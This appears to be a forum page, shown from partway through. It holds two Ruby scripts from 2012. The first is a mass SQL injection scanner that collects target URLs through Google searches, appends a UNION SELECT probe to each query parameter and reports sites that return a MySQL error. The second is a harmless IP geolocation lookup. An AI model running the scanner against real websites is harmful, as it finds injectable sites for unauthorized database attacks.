  print " @@@@ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @@@@ @ @@@ @ @@@ @@@ @@ @@@ @ @@ @ @@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @@@@@ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@@ @@@ @@@@ @ @@@ @@@ @@@ @@@@ @ @@@ @ @ @ @@@@ "
end

# Wait for Enter, then show the menu again (menu and retor call each other,
# so every round adds a stack frame).
def retor()
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  menu()
end

# Print the credits and end the program with exit status 1.
def copyright()
  print "\n\n(C) Doddy Hackman 2012\n\n"
  exit(1)
end

# Print the author's note.
def about()
  print " This program was written by Doddy in the summer of 2012, I will not take responsibility for any misuse that can be given to the program was written only for educational purposes. 
Any questions or suggestions please contact me my mail lepuke [at] hotmail.com "
end

# Query the search engine for +string+ and return the unique values captured
# from the result links.
#
# +cantidad+ is the page count as typed by the user (a string); the loop runs
# over the string range "1"..cantidad and raises the start offset by 10 on
# each pass. Only the first space in +string+ is replaced by "+" (String#sub).
# From every URI found in the response, the second capture of the
# "cache:...:...+" pattern is kept.
def googlear(string,cantidad)
  print "\n\n[+] Searching ....\n\n"
  string = string.sub(/ /,"+")
  contador = 0
  guardo = []
  for i in ("1"..cantidad)
    contador+=10
    url = "http://www.google.com.ar/search?hl=&q=#{string}&start=#{contador}"
    code = toma(url)
    links = URI::extract(code)
    links.each do |link|
      if link=~/cache:(.*?):(.*?)\+/
        guardo.push($2)
      end
    end
  end
  guardo = guardo.uniq
  print "\n\n[+] Pages Count : ",guardo.length,"\n\n"
  return guardo
end

# Append +text+ as one line to +file+ (opened in append mode).
def savefile(file,text)
  save = File.open(file, "a")
  save.puts text+"\n"
  save.close
end

# Show the menu, read one option and run it.
def menu()
  head()
  print "\n\n1 - Search in google\n"
  print "2 - Scan SQLI\n"
  print "3 - About\n"
  print "4 - Exit"
  print "\n\n[Option] : "
  op = gets.chomp
  if op == "1"
    print "\n\n[+] String : "
    string = gets.chomp
    print "\n\n[+] Pages : "
    pages = gets.chomp
    total = googlear(string,pages)
    total.each do |to|
      print "[Link] : ",to,"\n"
      # The output file name is the search string itself plus ".txt".
      savefile(string+".txt",to)
    end
    retor()
  elsif op=="2"
    print "\n\n[+] File : "
    fi = gets.chomp
    paginas = openwords(fi)
    print "[+] Scanning ..\n\n\n"
    paginas.each do |pag|
      pag = pag.chomp
      # Only lines containing "=" are used; the greedy first group keeps
      # everything up to the last "=" and the value after it is dropped.
      if pag=~/(.*)=(.*)/
        final = $1+"="
        # One GET per URL with the fixed probe appended. The response is
        # flagged only when it contains this exact MySQL error text, so a
        # server that does not echo database errors is never reported.
        code = toma(final+"1+and+1=0+union+select+1--")
        if code=~/The used SELECT statements have a different number of columns/
          print "[SQLI] : "+final+"\n"
        end
      end
    end
    print "\n\n[+] Finished\n\n"
    retor()
  elsif op =="3"
    about()
    gets.chomp
    menu()
  elsif op=="4"
    copyright()
  else
    menu()
  end
end

menu()

# The End ?
|
|
|
290
|
Programación / Scripting / [Ruby] IP Locator 0.1
|
en: 11 Febrero 2012, 23:06 pm
|
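Un localizador de IP.

#!usr/bin/ruby
#IP Locator 0.1
#Coded By Doddy H
#
# Resolves the host name given on the command line and prints the city,
# country and region that a public geolocation page reports for that address.
#
# The lookup goes to a third party over plain HTTP: the queried address is
# visible to that service and to the network path, and the answer is not
# authenticated. Treat the printed values as a hint, not as evidence.

require "net/http"
require "resolv"

# Print the command-line usage.
def uso
  print "\n[+] iplocator.rb <site>\n"
end

# Fetch +web+ with an HTTP GET and return the response body.
def toma(web)
  return Net::HTTP.get_response(URI.parse(web)).body
end

# Print the program banner.
def head()
  print "\n\n -- == IP Locator 0.1 == --\n\n"
end

# Print the credits and end the program with exit status 1.
def copyright()
  print "\n\n\n(C) Doddy Hackman 2012\n\n"
  exit(1)
end

# Return the value shown next to +etiqueta+ in the result page +code+,
# or nil when the label is not present.
#
# The groups are non-greedy so that a second table cell on the same line
# is not swallowed into the value. The text comes from a remote page and is
# written to the terminal, so control characters (escape sequences included)
# are removed before it is returned.
def campo(code, etiqueta)
  patron = /#{Regexp.escape(etiqueta)}<\/td><td align=[^>]*><b>(.*?)<\/b><\/td>/
  return nil unless code.to_s =~ patron
  $1.gsub(/[\x00-\x1f\x7f]/, "")
end

target = ARGV[0]
head()
if !target
  uso()
else
  begin
    ip = Resolv.getaddress(target)
    # Encode the address before it goes into the query string.
    web = "http://www.melissadata.com/lookups/iplocation.asp?ipaddress="+URI.encode_www_form_component(ip)
    print "\n\n[+] Getting info\n\n\n"
    code = toma(web)
    ["City", "Country", "State or Region"].each do |etiqueta|
      valor = campo(code, etiqueta)
      print "[+] "+etiqueta+" : "+valor+"\n" if valor
    end
  rescue Resolv::ResolvError
    # Name resolution failed: report it instead of ending with a backtrace.
    print "\n[-] Could not resolve "+target+"\n"
  rescue StandardError => e
    # Network or HTTP failure while contacting the lookup service.
    print "\n[-] Lookup failed : "+e.message+"\n"
  end
end
copyright()

# The End ?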
|
|
|
|
|
|
|